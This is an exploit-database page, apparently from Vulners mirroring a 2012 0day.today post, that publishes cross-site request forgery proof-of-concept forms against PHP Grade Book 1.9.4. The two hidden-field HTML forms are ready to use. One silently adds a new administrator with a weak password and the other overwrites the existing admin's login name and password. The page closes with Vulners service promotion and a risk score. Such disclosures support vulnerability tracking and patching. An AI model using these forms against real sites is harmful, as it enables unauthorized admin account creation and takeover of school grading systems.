Lucene search
K

PHP Grade Book 1.9.4 Multiple CSRF Vulnerability

🗓️ 13 May 2012 00:00:00Reported by AtT4CKxT3rR0r1STType 
zdt
 zdt
🔗 0day.today👁 19 Views

PHP Grade Book 1.9.4 Multiple CSRF Vulnerability in Add Admin and Edit Account Admin functions

Code
PHP Grade Book 1.9.4 Multiple CSRF Vulnerability
====================================================================
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [[email protected]]
.:. Script         : http://www.phpgradebook.com/
.:. Tested On Demo : http://www.phpgradebook.com/demo/admin/
.:. Gr34T$ T0 [aboud-el]
####################################################################
===[ Exploit ]===
[1]Add Admin
============
<html>
<head>
<title>PHP Grade Book [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/index.php?action=InsertNewAdmin">
<input type="hidden" name="NewRealName" value="Master Admin"/>
<input type="hidden" name="NewLoginName" value="Webadmin"/>
<input type="hidden" name="NewPassword" value="123456"/>
</form>
</body>
</html>
 
[2]Edit Account Admin
======================
<html>
<head>
<title>PHP Grade Book [Edit Account Admin]</title>
</head>
<H2>CSRF Edit Account Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/index.php?action=EditAdmin">
<input type="hidden" name="RealName" value="Master Admin"/>
<input type="hidden" name="LoginName" value="Webadmin"/>
<input type="hidden" name="Password" value="123456"/>
<input type="hidden" name="AdminID" value="1"/>
<input type="hidden" name="Password2" value="123456"/>
<input type="hidden" name="AdminID" value="1"/>
</form>
</body>
</html>
####################################################################



#  0day.today [2018-04-13]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 May 2012 00:00Current
7.1High risk
Vulners AI Score7.1
19